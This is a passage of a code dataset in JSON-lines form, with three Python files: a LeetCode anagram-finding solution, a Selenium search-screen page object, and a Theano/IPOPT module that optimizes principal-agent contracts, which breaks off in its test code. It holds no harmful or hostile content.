"call"}, {"api_name": "os.getpid", "line_number": 32, "usage_type": "call"}, {"api_name": "redis.StrictRedis", "line_number": 33, "usage_type": "call"}]}
+{"seq_id": "165893189", "text": "import collections\nfrom typing import List\n\n\nclass Solution:\n def findAnagrams(self, s: str, p: str) -> List[int]:\n if not p or len(p) > len(s): return []\n\n p_hash = collections.Counter(p)\n m, n, desired, formed = len(s), len(p), len(p_hash), 0\n s_hash = collections.defaultdict(int)\n result = []\n\n for j in range(n):\n c = s[j]\n s_hash[c] += 1\n if c in p_hash and p_hash[c] == s_hash[c]: formed += 1\n\n if formed == desired: result.append(0)\n\n r = n\n while r < m:\n l = r - n + 1 # get 1st char in n size window\n out_c, in_c = s[l - 1], s[r]\n\n if out_c in p_hash and p_hash[out_c] == s_hash[out_c]: formed -= 1\n s_hash[out_c] -= 1\n\n s_hash[in_c] += 1\n if in_c in p_hash and p_hash[in_c] == s_hash[in_c]: formed += 1\n\n if formed == desired: result.append(l)\n r += 1\n\n return result\n\n\n\n\n\n\n# 438. Find All Anagrams in a String\n# https://leetcode.com/problems/find-all-anagrams-in-a-string/description/\n\n# 'aabc' 'abc'\n\n# formed = 2\n# desired = 3\n\n\n# \"aab\"\n# {\n# a: 1\n# b: 1\n \n# }\n\n# \"ab\"\n\n# { a:1\n# b:1 \n# }\n\n# \"cbaebabacd\"\n# \"abc\"\n", "sub_path": "strings/sliding_window/find_all_anagrams_in_a_string.py", "file_name": "find_all_anagrams_in_a_string.py", "file_ext": "py", "file_size_in_byte": 1238, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "collections.Counter", "line_number": 9, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 11, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 6, "usage_type": "name"}]}
+{"seq_id": "374452769", "text": "from selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom time import *\r\nimport sys\r\nsys.path.append('..')\r\nfrom TestModel import BasePage, Functions\r\n\r\nclass Search(BasePage.BaseClass):\r\n\r\n def click_createanewone_button(self):\r\n WebDriverWait(self.driver, 15, 0.5).until(EC.element_to_be_clickable((By.XPATH, \"//div[@ng-if='allowAccountCreation']/a\"))).click()\r\n \r\n def input_searchkeyword(self, keyword):\r\n sleep(2)\r\n WebDriverWait(self.driver, 15, 0.5).until(EC.presence_of_element_located((By.XPATH, \"//input[@type='search']\"))).send_keys(keyword)\r\n sleep(1)\r\n self.driver.find_element_by_xpath(\"//input[@type='search']\").send_keys(Keys.ENTER)\r\n Functions.wait_element_visible(self.driver, By.XPATH, \"//h3[@class ='modal-title']\")\r\n Functions.wait_element_not_visible(self.driver, By.XPATH, \"//h3[@class ='modal-title']\")\r\n\r\n def click_view_button(self):\r\n js = \"var q=document.documentElement.scrollTop=10000\"\r\n self.driver.execute_script(js)\r\n WebDriverWait(self.driver, 20, 0.5).until(EC.visibility_of_element_located((By.XPATH, \"//button[@class='secondary-button desktop-only medium']\"))).click()\r\n Functions.wait_element_visible(self.driver, By.XPATH, \"//h3[@class ='modal-title']\")\r\n Functions.wait_element_not_visible(self.driver, By.XPATH, \"//h3[@class ='modal-title']\")\r\n if(Functions.wait_element_visible(self.driver, By.XPATH, \"//h3[@class ='modal-title']\")):\r\n Functions.wait_element_not_visible(self.driver, By.XPATH, \"//h3[@class ='modal-title']\")\r\n\r\n\r\n\r\n", "sub_path": "MIG_Portal_Automation/TestElements/Common_SearchScreen.py", "file_name": "Common_SearchScreen.py", "file_ext": "py", "file_size_in_byte": 1749, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.path.append", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "TestModel.BasePage.BaseClass", "line_number": 10, "usage_type": "attribute"}, {"api_name": "TestModel.BasePage", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 13, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 17, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 17, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 17, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 19, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 19, "usage_type": "name"}, {"api_name": "TestModel.Functions.wait_element_visible", "line_number": 20, "usage_type": "call"}, {"api_name": "TestModel.Functions", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "TestModel.Functions.wait_element_not_visible", "line_number": 21, "usage_type": "call"}, {"api_name": "TestModel.Functions", "line_number": 21, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 21, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 21, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 26, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 26, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 26, "usage_type": "name"}, {"api_name": "TestModel.Functions.wait_element_visible", "line_number": 27, "usage_type": "call"}, {"api_name": "TestModel.Functions", "line_number": 27, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 27, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 27, "usage_type": "name"}, {"api_name": "TestModel.Functions.wait_element_not_visible", "line_number": 28, "usage_type": "call"}, {"api_name": "TestModel.Functions", "line_number": 28, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 28, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 28, "usage_type": "name"}, {"api_name": "TestModel.Functions.wait_element_visible", "line_number": 29, "usage_type": "call"}, {"api_name": "TestModel.Functions", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 29, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 29, "usage_type": "name"}, {"api_name": "TestModel.Functions.wait_element_not_visible", "line_number": 30, "usage_type": "call"}, {"api_name": "TestModel.Functions", "line_number": 30, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 30, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 30, "usage_type": "name"}]}
+{"seq_id": "254856996", "text": "\"\"\"\nThis class includes the principal optimization problem.\n\"\"\"\n__all__ = ['PrincipalProblem']\n\n\nimport theano\nimport theano.tensor as T\nimport itertools\nimport design\nimport numpy as np\nimport sys\nimport scipy.optimize as opt\nfrom sepdesign._types import AgentType\nfrom sepdesign._agent import Agent\nfrom sepdesign._utility_functions import UtilityFunction\nfrom sepdesign._value_functions import ValueFunction\nfrom sepdesign._transfer_functions import TransferFunction\nfrom sepdesign._individual_rationality import IndividualRationality\nfrom sepdesign._function import *\nimport warnings\ntry:\n import pyipopt\nexcept:\n warnings.warn('*** Could not find pyipopt. ***')\ntry:\n from pyDOE import lhs\nexcept:\n warnings.warn('*** Could not find pyDOE. ***')\n\n# Flattens a list of lists\nflatten = lambda l: [item for sublist in l for item in sublist]\n\n\ndef run_and_print(func, verbosity, *args, **kwargs):\n \"\"\"\n Run func(*args, **kwargs) and print something msg.\n \"\"\"\n if verbosity >= 0:\n sys.stdout.write('Running ' + str(func) + '...')\n res = func(*args, **kwargs)\n if verbosity >= 0:\n sys.stdout.write(' Done!\\n')\n return res\n\n\nclass PrincipalProblem(object):\n \"\"\"\n A class representing the problem faced by the principal.\n\n :param u: A utility function for the principal.\n :param v: A value function for the system.\n :param agents: A list of agents. Each element of the list is either.\n :param t: The form of the transfer function.\n :param sg_level: The sparse grid level for taking the expectation over\n the xi's.\n :param verbosity: The verbosity level of the class.\n \"\"\"\n\n def __init__(self, u, v, agents, t, sg_level=6, verbosity=1):\n assert isinstance(u, UtilityFunction)\n self._u = u\n assert isinstance(v, ValueFunction)\n self._v = v\n if isinstance(agents, Agent):\n agents = [agents]\n assert isinstance(agents, list)\n for a in agents:\n assert isinstance(a, Agent)\n assert len(agents) == v.num_subsystems\n self._agents = agents\n assert isinstance(t, TransferFunction)\n self._t = t\n assert isinstance(sg_level, int)\n self._sg_level = sg_level\n assert isinstance(verbosity, int)\n self._verbosity = verbosity\n self._setup_exp_u()\n self._num_param = np.sum([a.num_types for a in self.agents]) * t.num_a\n self._compiled = False\n\n def _setup_exp_u(self):\n \"\"\"\n Set up the following:\n + self.exp_u_raw: The expected utility of the principal as a\n Function of e_star and the transfer function\n parameters a. This is a Function. \n + self.exp_u: The expected utility of the principal as a function\n of the transfer function parameters a. This is a\n common Python function. It also returns the\n gradient of the exp_u with respect to a.\n \"\"\"\n # Setup the individual rationality constraints\n self._setup_irc()\n # Symbolic parameters of transfer functions (i-k)\n t_as = [[] for _ in range(self.num_agents)]\n # Symbolic optimal efforts (i-k)\n t_e_stars = [[] for _ in range(self.num_agents)]\n # Symbolic xis (i)\n t_xis = []\n # Symbolic efforts (i-k)\n t_qs = [[] for _ in range(self.num_agents)]\n t_ts = [[] for _ in range(self.num_agents)]\n for i in range(self.num_agents):\n t_xis.append(T.dvector('xi{%d}' % i))\n for k in range(self.agents[i].num_types):\n t_as[i].append(T.dvector('a{%d,%d}' % (i, k)))\n t_e_stars[i].append(T.scalar('e_stars{%d,%d}' % (i, k)))\n q_base = self.agents[i].agent_types[k].q\n t_qs[i].append(theano.clone(q_base.t_f,\n replace={q_base.t_x[0]: t_e_stars[i][k],\n q_base.t_x[1]: t_xis[i]}))\n t_ts[i].append(theano.clone(self.t.t_f,\n replace={self.t.t_x[0]: t_qs[i][k],\n self.t.t_x[1]: t_as[i][k]}))\n # For all possible combinations of agent types\n # Expected utility functions\n t_sum_u_over_comb = T.zeros((1,))\n for at_comb in self._agent_type_range(): # Loop over agent type combs\n # Get the value function for this combination of types in theano:\n t_v_comb = theano.clone(self.v.t_f,\n replace=dict((self.v.t_x[i], t_qs[i][at_comb[i]])\n for i in range(self.num_agents)))\n # The payoff to the principal for this combination of types\n t_pi_comb = t_v_comb - T.sum(\n [t_ts[i][at_comb[i]] for i in range(self.num_agents)], \n axis=0)\n # Multiply with the probability of type happening\n p_comb = np.prod([self.agents[i].type_probabilities[at_comb[i]] \n for i in range(self.num_agents)])\n # The utility of the principal for this combination of types\n t_u = theano.clone(self.u.t_f, replace={self.u.t_x[0]: t_pi_comb})\n # Start summing up\n t_sum_u_over_comb += p_comb * t_u\n #theano.printing.pydotprint(t_sum_u_over_comb, outfile='tmp.png')\n # Take the expectation over the Xi's numerically\n Z, w_unorm = design.sparse_grid(self.num_agents, self._sg_level, 'GH')\n Xi = Z * np.sqrt(2.0)\n w = w_unorm / np.sqrt(np.pi ** self.num_agents)\n t_tmp = theano.clone(t_sum_u_over_comb,\n replace=dict((t_xis[i], Xi[:, i])\n for i in range(self.num_agents)))\n #theano.printing.pydotprint(t_tmp, outfile='tmp.png')\n # THEANO OBJECT REPRESENTING THE EXPECTED UTILITY OF THE PRINCIPAL:\n t_exp_u_raw = T.dot(w, t_tmp)\n t_e_stars_f = flatten(t_e_stars)\n t_as_f = flatten(t_as)\n self._exp_u_raw = Function(t_e_stars_f + t_as_f, t_exp_u_raw)\n # Take derivative with respect to e_stars\n self._exp_u_raw_g_e = self._exp_u_raw.grad(t_e_stars_f)\n # Take derivative with respect to the as\n self._exp_u_raw_g_a = self._exp_u_raw.grad(t_as_f)\n\n def compile(self):\n \"\"\"\n Compile all Functions.\n \"\"\"\n run_and_print(self.exp_u_raw.compile, self.verbosity) \n run_and_print(self.exp_u_raw_g_e.compile, self.verbosity)\n run_and_print(self.exp_u_raw_g_a.compile, self.verbosity)\n for i in range(self.num_agents):\n for k in range(self.agents[i].num_types):\n run_and_print(self._irc[i][k].compile, self.verbosity)\n self._compiled = True\n \n def evaluate(self, a):\n \"\"\"\n Evaluate the expected utility of the principal along its gradient\n wrt to a.\n \"\"\"\n if not self._compiled:\n raise RuntimeError('You must compile first.')\n # We will return a dictionary with the results\n res = {}\n # aas[i][k] is the transfer parameters of agent i type k\n aas = [[] for i in range(self.num_agents)]\n # e_stars[i][k] is the optimal effort of agent i type k\n e_stars = [[] for i in range(self.num_agents)]\n # e_stars_g_a[i][k] is the gradient of the optimal effort of agent i\n # type k with respect to aas[i][k]\n e_stars_g_a = [[] for i in range(self.num_agents)]\n # exp_u_pi_e_stars[i][k] is the expected utility of agent i type k\n # at e_stars[i][k] using transfer parameters aas[i][k]\n exp_u_pi_e_stars = [[] for i in range(self.num_agents)]\n count_as = 0\n for i in range(self.num_agents):\n ag_i = self.agents[i]\n a_i = a[count_as:count_as + self.t.num_a * ag_i.num_types]\n count_as += ag_i.num_types\n for k in range(ag_i.num_types):\n a_ik = a_i[k * self.t.num_a:(k+1) * self.t.num_a]\n aas[i].append(a_ik)\n res_ik = self._irc[i][k].evaluate(a_ik)\n e_stars[i].append(res_ik['e_star'])\n e_stars_g_a[i].append(res_ik['e_star_g_a'])\n exp_u_pi_e_stars[i].append(res_ik['exp_u_pi_e_star'])\n res['exp_u_pi_agents'] = exp_u_pi_e_stars\n # Flatten the list in order to pass them to the functions\n e_stars_f = flatten(e_stars)\n aas_f = flatten(aas)\n e_stars_ga_f = flatten(e_stars_g_a)\n # Evaluate the expected utility of the principal\n exp_u_pi_0 = self._exp_u_raw(*(e_stars_f + aas_f))\n res['exp_u_pi_0'] = exp_u_pi_0\n res['e_stars'] = e_stars_f\n # Evaluate derivative of exp_u_pi_0 with respect to e at e_stars and a\n exp_u_pi_0_raw_g_e = self._exp_u_raw_g_e(*(e_stars_f + aas_f))\n # Evaluate derivative of exp_u_pi_0 with respect to a at e_stars and a\n exp_u_pi_0_raw_g_a = self._exp_u_raw_g_a(*(e_stars_f + aas_f))\n # Evaluate the total derivative of exp_u_pi_0 wrt a's at e_stars and a\n d_exp_u_da_list = []\n num_agent_types = np.sum([a.num_types for a in self._agents])\n tmp = np.zeros((self.num_param,))\n for i in range(num_agent_types):\n part1 = exp_u_pi_0_raw_g_e[i] * e_stars_ga_f[i]\n part2 = exp_u_pi_0_raw_g_a[i]\n d_exp_u_da_list += [part1 + part2]\n res['d_exp_u_pi_0_da'] = np.hstack(d_exp_u_da_list)\n return res\n\n def optimize_contract(self, *args):\n \"\"\"\n Returns the optimal contract.\n \"\"\"\n # Optimization bounds\n # bnds = np.array([(0.0, 2.0) for _ in range(self.num_param)])\n\n n_bnds = self.num_param / self.t.num_a\n if self.t.num_a == 4:\n bnds = np.array([(0.0, 0.05), (0.0001, .5), (0.7, 1.5), (0.0, .6)]*n_bnds)\n else:\n bnds = np.array([(0.0, 0.05), (0.0001, .8), (0.7, 1.5)]*n_bnds)\n\n # The objective function \n def obj_fun(a, obj):\n res = obj.evaluate(a)\n return -res['exp_u_pi_0'], -res['d_exp_u_pi_0_da']\n\n # The participation constraints\n def part_const(a, irc_ik, i, k, num_types, num_a, count_as):\n # Extract the part of a that is relevant\n a_i = a[count_as:count_as + num_a * num_types]\n a_ik = a_i[k * num_a:(k+1) * num_a]\n res_ik = irc_ik.evaluate(a_ik)\n return res_ik['exp_u_pi_e_star']\n\n # The incentive comptability constraints\n def inc_comp_const(a, irc_ik, i, k, kf, \n num_types, num_a, count_as):\n # Extract the part of a that is relevant\n a_i = a[count_as:count_as + num_a * num_types]\n a_ik = a_i[k * num_a:(k+1) * num_a]\n a_ikf = a_i[kf * num_a:(kf+1) * num_a]\n res_ik = irc_ik.evaluate(a_ik)\n res_ikf = irc_ik.evaluate(a_ikf)\n # res_ik >= res_ikf\n return res_ik['exp_u_pi_e_star'] - res_ikf['exp_u_pi_e_star']\n\n # The Jacobian of the participation constraint\n def part_const_jac(a, irc_ik, i, k, num_types, num_a, count_as):\n a_i = a[count_as:count_as + num_a * num_types]\n a_ik = a_i[k * num_a:(k+1) * num_a]\n res_ik = irc_ik.evaluate(a_ik)\n jac_ik = res_ik['exp_u_pi_e_star_g_a']\n jac = np.zeros(a.shape)\n jac[count_as + num_a * k:count_as + num_a * (k + 1)] = jac_ik \n return jac\n\n # The incentive comptability constraints\n def inc_comp_const_jac(a, irc_ik, i, k, kf, \n num_types, num_a, count_as):\n # Extract the part of a that is relevant\n a_i = a[count_as:count_as + num_a * num_types]\n a_ik = a_i[k * num_a:(k+1) * num_a]\n a_ikf = a_i[kf * num_a:(kf+1) * num_a]\n res_ik = irc_ik.evaluate(a_ik)\n res_ikf = irc_ik.evaluate(a_ikf)\n jac_ik = res_ik['exp_u_pi_e_star_g_a']\n jac_ikf = res_ikf['exp_u_pi_e_star_g_a']\n jac = np.zeros(a.shape)\n jac[count_as + num_a * k:count_as + num_a * (k + 1)] = jac_ik \n jac[count_as + num_a * kf:count_as + num_a * (kf + 1)] = -jac_ikf\n return jac\n\n def eval_f(a, user_data=None):\n res = self.evaluate(a)\n return -res['exp_u_pi_0']\n\n def eval_grad_f(a, user_data=None):\n res = self.evaluate(a)\n return np.array(-res['d_exp_u_pi_0_da']).flatten()\n\n def eval_g(x, user_data=None):\n part_cons = []\n count_as = 0\n for i in range(self.num_agents):\n ag_i = self.agents[i]\n for k in range(ag_i.num_types):\n con = part_const(x, self._irc[i][k], i, k,\n ag_i.num_types, self.t.num_a,\n count_as)\n part_cons.append(con)\n count_as += ag_i.num_types\n count_as = 0\n for i in range(self.num_agents):\n ag_i = self.agents[i]\n for k in range(ag_i.num_types):\n for kf in range(ag_i.num_types):\n if kf != k:\n con = inc_comp_const(x, self._irc[i][k],i,\n k, kf, ag_i.num_types,\n self.t.num_a, count_as)\n part_cons.append(con)\n count_as += ag_i.num_types\n return np.array(part_cons).flatten()\n\n nvar = self.num_param\n x_L = np.array(bnds[:,0], dtype=np.float_)\n x_U = np.array(bnds[:,1], dtype=np.float_)\n test = np.array(np.zeros(nvar))\n self.ncon = eval_g(test).shape[0]\n\n g_L = np.array([0.0]*self.ncon, dtype=np.float_)\n g_U = np.array([pow(10.0,20)]*self.ncon, dtype=np.float_)\n\n def eval_jac_g(x, flag, user_data=None):\n if flag:\n return (np.array([[_]*self.num_param for _ in range(self.ncon)]).flatten(),\n np.array(list(np.arange(self.num_param))*self.ncon))\n else:\n part_cons = []\n count_as = 0\n for i in range(self.num_agents):\n ag_i = self.agents[i]\n for k in range(ag_i.num_types):\n con = part_const_jac(x, self._irc[i][k], \n i, k, ag_i.num_types,\n self.t.num_a, count_as)\n part_cons.append(con)\n count_as += ag_i.num_types\n count_as = 0\n for i in range(self.num_agents):\n ag_i = self.agents[i]\n for k in range(ag_i.num_types):\n for kf in range(ag_i.num_types):\n if kf != k:\n con = inc_comp_const_jac(x, \n self._irc[i][k], \n i, k, kf, \n ag_i.num_types, \n self.t.num_a, count_as)\n part_cons.append(con)\n count_as += ag_i.num_types\n return np.array(part_cons).flatten()\n\n nlp = pyipopt.create(nvar, x_L, x_U, self.ncon, g_L, g_U,\n self.num_param * self.ncon, nvar**2, eval_f,\n eval_grad_f, eval_g, eval_jac_g)\n nlp.int_option('max_iter', 1000)\n nlp.int_option('print_frequency_iter',100)\n nlp.num_option('tol', 1e-6)\n # nlp.str_option('linear_solver','ma27')\n\n comp = 1.0e99\n x_ret = None\n x0 = np.array(np.zeros(nvar))\n if not args:\n num_restarts = 10\n samples = lhs(self.num_param, samples = num_restarts, criterion = 'c')\n elif len(args) == 1:\n num_restarts = args[0]\n samples = lhs(self.num_param, samples = num_restarts, criterion = 'c')\n else:\n num_restarts_total = args[0]\n samples = args[1]\n ind_seed = np.array(args[2]).flatten()\n samples = samples[ind_seed, :]\n num_restarts = np.array(ind_seed).flatten().shape[0]\n samples = bnds[:,0] + samples*(bnds[:,1]-bnds[:,0])\n final_result = {}\n for i in range(num_restarts):\n print(('restart number:', i+1))\n x0 = samples[i,:]\n x, zl, zu, constraint_multipliers, obj, status = nlp.solve(x0)\n print(('status', status))\n if obj < comp:\n comp = obj\n x_ret = x\n print(x)\n final_result['x'] = x_ret\n final_result['obj'] = -obj\n return final_result\n\n # Test optimization\n\n # fun_min = 1e99\n # res_min = None\n # for n in range(num_restarts):\n # a0 = bnds[:, 0] + (bnds[:, 1] - bnds[:, 0]) * np.random.rand(self.num_param)\n # print n\n # try:\n # res = opt.minimize(obj_fun, a0, jac=True, args=(self,), method='slsqp',\n # bounds=bnds, constraints=part_cons, options={'disp':True})\n # if fun_min > res['fun'] and res.success:\n # fun_min = res['fun']\n # res_min = res\n # print res\n # print '*' * 80\n # r = self.evaluate(res_min.x)\n # print 'contract parameters:', res_min.x\n # print r \n # print '*' * 80\n # except:\n # print 'Optimization failed.'\n # return res_min\n\n def _setup_irc(self):\n \"\"\"\n Set up individual rationality constraints.\n \"\"\"\n # Individual rationality constraints (i-k)\n irc = [[] for _ in range(self.num_agents)]\n for i in range(self.num_agents):\n for k in range(self.agents[i].num_types):\n irc[i].append(\n IndividualRationality(self.agents[i].agent_types[k], self.t))\n self._irc = irc\n\n def _agent_type_range(self):\n \"\"\"\n Returns an iterator over all possible combinations of agent types.\n \"\"\"\n return itertools.product(*(list(range(a.num_types)) for a in self.agents))\n\n\n\n @property\n def verbosity(self):\n \"\"\"\n Return the verbosity level of the class.\n \"\"\"\n return self._verbosity\n\n @property\n def exp_u_raw(self):\n \"\"\"\n Get the expected utility of the principal as a Function with inputs\n e_star and the transfer function parameters a.\n \"\"\"\n return self._exp_u_raw\n\n @property\n def exp_u_raw_g_e(self):\n \"\"\"\n Return the derivative of the expected utility of the principal with\n respect to all e_stars as a function of e_star and the transfer\n function parameters a.\n \"\"\"\n return self._exp_u_raw_g_e\n\n @property\n def exp_u_raw_g_a(self):\n \"\"\"\n Return the derivative of the expected utility of the principal with\n respect to all transfer function parameters a as a function of e_star\n and a.\n \"\"\"\n return self._exp_u_raw_g_a\n \n @property\n def num_agents(self):\n \"\"\"\n Get the number of agents.\n \"\"\"\n return len(self.agents)\n\n @property\n def agents(self):\n \"\"\"\n Get the agents.\n \"\"\"\n return self._agents\n\n @property\n def t(self):\n \"\"\"\n Get the transfer function.\n \"\"\"\n return self._t\n\n @property\n def v(self):\n \"\"\"\n Get the value function.\n \"\"\"\n return self._v\n\n @property\n def u(self):\n \"\"\"\n Get the utility function of the principal.\n \"\"\"\n return self._u\n\n @property\n def num_param(self):\n \"\"\"\n Get the total number of transfer function parameters.\n \"\"\"\n return self._num_param\n\n def __repr__(self):\n \"\"\"\n Return a string representation of the class.\n \"\"\"\n return 'PrincipalProblem(v=' + str(self.v) + \\\n ', agents=' + str(self.agents) + \\\n ', t=' + str(self.t)\n\n\nif __name__ == '__main__':\n from ._quality_functions import *\n from ._cost_functions import *\n from ._utility_functions import *\n from ._transfer_functions import *\n from ._value_functions import *\n import numdifftools as nd\n\n\n # Creat an example to test the optimize_contract\n\n agent_type11 = AgentType(LinearQualityFunction(2., 0.1), \n QuadraticCostFunction(0.02),\n ExponentialUtilityFunction())\n\n agent_type12 = AgentType(LinearQualityFunction(1.2, 0.3),\n QuadraticCostFunction(0.02),\n ExponentialUtilityFunction(.0))\n agents = Agent([agent_type11])\n\n t = RequirementPlusIncentiveTransferFunction(gamma=30.)\n\n p = PrincipalProblem(ExponentialUtilityFunction(),\n RequirementValueFunction(1, gamma=5.),\n agents, t)\n p.compile()\n a = [1.54857533e-06, 8.96740975e-03, 1.21648850e+00, 7.43227452e-03]\n res = p.evaluate(a)\n print(res)\n quit()\n res = p.optimize_contract()\n print('evaluate the variables in the optimum point of the contract')\n print(res)\n print((p.evaluate(res['x'])))\n quit()\n\n\n\n # Create an agent of a specific type\n agent_type11 = AgentType(LinearQualityFunction(1.5, 0.05),\n QuadraticCostFunction(0.0),\n ExponentialUtilityFunction())\n agent_type12 = AgentType(LinearQualityFunction(1.5, 0.2),\n QuadraticCostFunction(0.1),\n ExponentialUtilityFunction(2.0))\n agent_type21 = AgentType(LinearQualityFunction(2.5, 0.1),\n QuadraticCostFunction(0.3),\n ExponentialUtilityFunction(1.5))\n agent_type22 = AgentType(LinearQualityFunction(1.5, 0.3),\n QuadraticCostFunction(0.1),\n ExponentialUtilityFunction(0.0))\n\n # Create the agents\n agent1 = Agent([agent_type11, agent_type12])\n agent2 = Agent([agent_type21, agent_type22])\n agents = [agent1, agent2]\n # Create a transfer function\n t = RequirementPlusIncentiveTransferFunction()\n\n # Create the principal's problem\n p = PrincipalProblem(ExponentialUtilityFunction(0.0),\n RequirementValueFunction(2),\n agents, t)\n\n # Compile everything\n # p.compile()\n\n num_xis = 10000\n xi = np.random.randn(num_xis)\n\n # Test 1: N=1, M=1\n agent_type = AgentType(LinearQualityFunction(2.0, 0.1), \n QuadraticCostFunction(0.02),\n ExponentialUtilityFunction())\n agents = Agent(agent_type)\n t = RequirementPlusIncentiveTransferFunction(gamma = 30.0)\n\n p = PrincipalProblem(ExponentialUtilityFunction(),\n RequirementValueFunction(1, gamma=10.),\n agents, t)\n p.compile()\n q1 = p.agents[0].agent_types[0].q\n v1 = p.v\n t1 = p.t\n q1.compile()\n v1.compile()\n t1.compile()\n a = [1.54857533e-06, 8.96740975e-03, 1.21648850e+00, 7.43227452e-03]\n result = p.evaluate(a)\n print(result)\n quit()\n mc = np.sum(v1(q1(result['e_stars'][0],xi)) - \\\n t1(q1(result['e_stars'][0], xi), a)) / num_xis \n print('Test cases for N=1, M=1:')\n print(('expected utility check for N=1, M=1: Monte Carlo: {}, Collocation: {}'.format(mc, result['exp_u_pi_0'])))\n exp_u = p.exp_u_raw\n exp_u.compile()\n p._setup_irc\n ir1 = p._irc[0][0]\n ir1.compile()\n\n f1 = lambda _a: exp_u(result['e_stars'][0], _a)\n f2 = lambda _e: exp_u(_e, a)\n f3 = lambda _a: ir1.evaluate(_a)['e_star']\n\n gf1 = nd.Gradient(f1)\n gf2 = (f2(result['e_stars'][0]+1.0e-6)-f2(result['e_stars'][0]-1.0e-6))/(2.e-6)\n gf3 = nd.Gradient(f3)\n\n dexp_numerical = gf2 * gf3(a) + gf1(a)\n print(('dE[u]/da11 check for N=1, M=1: Numerical derivative: {}, AD theano: {}'.format(dexp_numerical, result['d_exp_u_pi_0_da'])))\n print('##########')\n # Test2: N=1, M=2\n\n agent_type11 = AgentType(LinearQualityFunction(1.2, 0.2), \n QuadraticCostFunction(0.1),\n ExponentialUtilityFunction(0.0))\n agent_type12 = AgentType(LinearQualityFunction(1.1, 0.3), \n QuadraticCostFunction(0.1),\n ExponentialUtilityFunction(2.0))\n agents = Agent([agent_type11, agent_type12])\n\n t = RequirementPlusIncentiveTransferFunction()\n p = PrincipalProblem(ExponentialUtilityFunction(),\n RequirementValueFunction(1),\n agents, t)\n p.compile()\n\n q1 = p.agents[0].agent_types[0].q\n q2 = p.agents[0].agent_types[1].q\n v1 = p.v\n t1 = p.t\n q1.compile()\n\n q2.compile()\n v1.compile()\n t1.compile()\n\n a1 = np.array([0.0, 0.2, 1.0, 0.05])\n a2 = np.array([0.05, 0.3, 1.0, 0.1])\n a = np.concatenate([a1, a2])\n result = p.evaluate(a)\n\n temp1 = 0.5*(v1(q1(result['e_stars'][0],xi)) - \\\n t1(q1(result['e_stars'][0], xi), a1))\n temp2 = 0.5*(v1(q2(result['e_stars'][1],xi)) - \\\n t1(q2(result['e_stars'][1], xi), a2))\n mc = np.sum(temp1 + temp2) / num_xis \n print('Test cases for N=1, M=2')\n print(('expected utility check for N=1, M=2: Monte Carlo: {}, Collocation: {}'.format(mc, result['exp_u_pi_0'])))\n \n exp_u = p.exp_u_raw\n exp_u.compile()\n p._setup_irc\n ir1 = p._irc[0][0]\n ir2 = p._irc[0][1]\n ir1.compile()\n ir2.compile()\n\n f1 = lambda _a1: exp_u(result['e_stars'][0], result['e_stars'][1], _a1, a2)\n f2 = lambda _e1, _e2: exp_u(_e1, _e2, a1, a2)\n f3 = lambda _a: ir1.evaluate(_a)['e_star']\n gf1 = nd.Gradient(f1)\n gf2 = (f2(result['e_stars'][0]+1.0e-6, result['e_stars'][1])-\\\n f2(result['e_stars'][0]-1.0e-6, result['e_stars'][1]))/(2.e-6)\n gf3 = nd.Gradient(f3)\n dexp_numerical = gf2 * gf3(a1) + gf1(a1)\n print(('dE[u]/da_11 check for N=1, M=2: Numerical derivative: {}, AD theano: {}'.format(dexp_numerical, result['d_exp_u_pi_0_da'][0])))\n\n f1 = lambda _a2: exp_u(result['e_stars'][0], result['e_stars'][1], a1, _a2)\n f2 = lambda _e1, _e2: 